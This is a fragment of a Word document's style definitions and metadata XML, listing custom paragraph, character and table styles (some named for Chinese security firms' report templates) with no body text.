    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="231">
    <w:name w:val="dev-sites"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="232">
    <w:name w:val="title"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="233">
    <w:name w:val="列表段落1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="234">
    <w:name w:val="A1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Arial"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="235">
    <w:name w:val="代码块"/>
    <w:basedOn w:val="29"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2DBDB" w:themeFill="accent2" w:themeFillTint="33"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:firstLineChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="236">
    <w:name w:val="lc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7">
    <w:name w:val="空两格"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:firstLine="200" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="238">
    <w:name w:val="src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9">
    <w:name w:val="二级标题"/>
    <w:basedOn w:val="3"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:ind w:left="576" w:hanging="576"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="240">
    <w:name w:val="正文（360）"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300" w:lineRule="auto"/>
      <w:jc w:val="both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character" w:customStyle="1" w:styleId="241">
    <w:name w:val="title-box"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="242">
    <w:name w:val="pull-right"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="243">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="244">
    <w:name w:val="treelabel"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="245">
    <w:name w:val="text"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="246">
    <w:name w:val="middle"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="247">
    <w:name w:val="彩色列表1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48">
    <w:name w:val="样式_2"/>
    <w:basedOn w:val="249"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="249">
    <w:name w:val="样式_1"/>
    <w:basedOn w:val="250"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="250">
    <w:name w:val="样式"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="251">
    <w:name w:val="b"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="252">
    <w:name w:val="1标题"/>
    <w:basedOn w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:bCs w:val="0"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="253">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="32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54">
    <w:name w:val="代码块1"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine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rFonts w:eastAsia="微软雅黑" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="255">
    <w:name w:val="Subtle Reference"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine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256">
    <w:name w:val="Grid Table Light"/>
    <w:basedOn w:val="34"/>
    <w:autoRedefine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257">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="258">
    <w:name w:val="pl-ii"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="259">
    <w:name w:val="页脚密级（绿盟科技） Char"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="260"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="260">
    <w:name w:val="页脚密级（绿盟科技）"/>
    <w:basedOn w:val="261"/>
    <w:link w:val="259"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:color w:val="FF0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="261">
    <w:name w:val="页脚右端（绿盟科技）"/>
    <w:basedOn w:val="132"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="right"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="262">
    <w:name w:val="Numbered list 2.1"/>
    <w:basedOn w:val="2"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="720"/>
        <w:tab w:val="clear" w:pos="4153"/>
        <w:tab w:val="clear" w:pos="8306"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="263">
    <w:name w:val="网格表 4 - 着色 62"/>
    <w:basedOn w:val="34"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="49"/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character" w:customStyle="1" w:styleId="264">
    <w:name w:val="code-snippet__regexp"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="265">
    <w:name w:val="NERCIS-一级标题"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:ind w:left="432" w:hanging="432"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="0"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="266">
    <w:name w:val="标题 2（长城网际）"/>
    <w:basedOn w:val="3"/>
    <w:next w:val="267"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:spacing w:line="415" w:lineRule="auto"/>
      <w:ind w:left="794" w:hanging="794"/>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="267">
    <w:name w:val="正文（长城网际）"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300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268">
    <w:name w:val="正文（自定义）"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="269">
    <w:name w:val="插图标注（自定义）"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="268"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="9"/>
      </w:numPr>
      <w:spacing w:before="156" w:beforeLines="50" w:after="312" w:afterLines="100" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="270">
    <w:name w:val="data-box__tit"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="271">
    <w:name w:val="url-filename"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="272">
    <w:name w:val="url-chars"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="273">
    <w:name w:val="金正文"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:beforeLines="15"/>
      <w:ind w:firstLine="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体" w:eastAsiaTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="274">
    <w:name w:val="清单表 3 - 着色 51"/>
    <w:basedOn w:val="34"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="48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tcPr>
        <w:tcBorders>
          <w:top w:val="single" w:color="4BACC6" w:themeColor="accent5" w:sz="4" w:space="0"/>
          <w:bottom w:val="single" w:color="4BACC6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BACC6" w:themeColor="accent5" w:sz="4" w:space="0"/>
          <w:left w:val="nil"/>
        </w:tcBorders>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="swCell">
      <w:tcPr>
        <w:tcBorders>
          <w:top w:val="double" w:color="4BACC6" w:themeColor="accent5" w:sz="4" w:space="0"/>
          <w:right w:val="nil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2EF5BF-9183-4CBB-9F0C-FD8B9B10A3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812</Words>
  <Characters>980</Characters>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>100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3T08:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-03T08:32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467FA264D3E4A60AF8079DFD7FEF745_13</vt:lpwstr>
  </property>
</Properties>
</file>